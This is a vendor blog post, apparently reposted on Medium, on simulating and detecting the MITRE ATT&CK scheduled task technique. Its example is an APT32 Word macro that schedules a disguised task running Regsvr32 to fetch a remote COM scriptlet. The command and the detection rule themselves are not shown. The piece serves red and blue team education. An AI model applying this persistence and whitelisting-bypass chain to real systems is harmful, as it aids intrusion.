Picus Security
Published in

Picus Security

How to Simulate and Detect MITRE ATT&CK T1053 Scheduled Task/Job Technique

by Süleyman Özarslan, PhD

A scheduled task is a command, program or script to be executed at:

  • a particular time in the future (e.g. 11/08/2022 1:00 a.m.
  • at regular intervals (e.g. every Monday at 1:00 a.m.)
  • when a defined event occurs (e.g. a user logs on the system).

Legitimate users like system administrators use scheduled tasks to create and run operational tasks automatically. Adversaries also use task scheduling utilities of operating systems to execute malicious payloads on a defined schedule or at system startup to achieve persistence. Our research has found that Scheduled Task was the seventh most prevalent MITRE ATT&CK technique used by adversaries in their malware.

Red and Blue Team Exercises

Red Teaming — How to simulate?

In this exercise, we explain a real scheduled task command in a malicious VBA macro in a Word document that was used by the APT32 Threat Group.

This payload was included in the following Word document:

Briefly, the below command in the VBA code embedded in the Word document creates a scheduled task named SystemSoundsServices (mimicking System Sounds Service of Windows) to run Regsvr32.exe every 30 minutes. Regsvr32.exe is used to bypass application whitelisting script protection for executing a Component Object Model (COM) scriptlet that is dynamically downloaded from the given URL.

In conclusion, the given code incorporates following MITRE ATT&CK techniques:

  • T1053.005 Scheduled Task
  • T1036.004 Masquerading: Masquerade Task or Service
  • T1218.010 Signed Binary Proxy Execution: Regsvr32
  • T1559.01 Inter-Process Communication: Component Object Model

If you’d like to learn more about MITRE ATT&CK, check out our LinkedIn group with all the latest! https://www.linkedin.com/groups/8955879/

Blue Teaming — How to detect?

The following Sigma rule can be used to detect creating a scheduled task that runs regsvr32.exe via schtasks.exe.

Originally published at https://www.picussecurity.com.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Picus Security Inc.

Picus Security Inc.

88 Followers

Breach and Attack Simulation (BAS) | Continuous Security Validation | Gartner Cool Vendor